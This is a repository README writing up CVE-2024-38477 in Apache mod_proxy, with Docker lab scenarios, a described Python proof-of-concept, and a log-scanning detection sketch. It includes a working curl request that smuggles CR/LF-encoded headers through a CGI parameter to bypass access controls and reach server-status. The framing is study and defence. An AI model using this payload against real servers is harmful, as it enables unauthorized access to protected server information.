2025-06-05 15:09:30 +02:00
apr-util-1.6.3 First commit 2025-06-05 15:09:30 +02:00
httpd-2.4.59 First commit 2025-06-05 15:09:30 +02:00
scenario1 First commit 2025-06-05 15:09:30 +02:00
scenario2 First commit 2025-06-05 15:09:30 +02:00
writeup First commit 2025-06-05 15:09:30 +02:00
.gitignore First commit 2025-06-05 15:09:30 +02:00
burp_random.py First commit 2025-06-05 15:09:30 +02:00
cve.py First commit 2025-06-05 15:09:30 +02:00
random.txt First commit 2025-06-05 15:09:30 +02:00
README.md First commit 2025-06-05 15:09:30 +02:00

Introduction

This project provides a write-up on CVE-2024-38477. To avoid crashing a production environment, the project contains two scenarios with a vulnerable Apache2 mod_proxy. These scenarios can be deployed with Docker.

This project contains a Proof of Concept: a Python script that executes the attack against the server.

Scenarios

Scenario 1

The first scenario is a Perl script that can be executed with Apache's CGI module. For testing, I created a Perl script that lists all directories and files in the path specified as an argument. The scenario can be deployed with Docker:

$ docker build -t cve-cgi scenario1/
$ docker run -p 8080:80 cve-cgi

With a simple curl request, you can perform an SSRF attack against the Apache server and bypass the ACL:

$ curl "http://localhost:8080/cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for localhost (via 172.17.0.2)</h1>
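
For defenders, the request above is recognizable in access logs: the r parameter carries percent-encoded CR/LF followed by header names. The following detection sketch is an added example, not part of this repository; the function names and the sample log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside an Apache access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A header-looking token ("Name:") that directly follows an injected line break
HEADER_RE = re.compile(r'[\r\n]+[ \t]*([A-Za-z][A-Za-z0-9-]*)[ \t]*:')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded CR/LF (%250d%250a) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def injected_headers(target):
    """Map each query parameter whose value carries CR/LF to the header names after it."""
    findings = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(value)  # parse_qsl has already decoded once
        if "\r" in value or "\n" in value:
            findings[name] = HEADER_RE.findall(value)
    return findings

def scan_log(lines):
    """Return (line number, request target, findings) for every suspicious entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = injected_headers(match.group("target"))
        if findings:
            hits.append((number, match.group("target"), findings))
    return hits

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jun/2025:15:10:02 +0200] "GET /cgi-bin/listings.cgi?r=/var/www HTTP/1.1" 200 512',
    '192.0.2.44 - - [05/Jun/2025:15:10:09 +0200] "GET /cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage'
    '%0d%0aContent-Type:server-status%0d%0a%0d%0a HTTP/1.1" 200 4096',
    '192.0.2.44 - - [05/Jun/2025:15:10:15 +0200] "GET /cgi-bin/listings.cgi?r=%250d%250aLocation%253a/x HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for number, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {findings} in {target}")
```

The same check can run in a log pipeline or WAF rule; a query value that decodes to a line break followed by Location or Content-Type has no legitimate use in these CGI scripts.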

Scenario 2

The second scenario is a Python script executed with the CGI module.

PoC

The Python script cve.py generates a new hostname using random values (ASCII letters, digits, and special characters) and sends it to the server.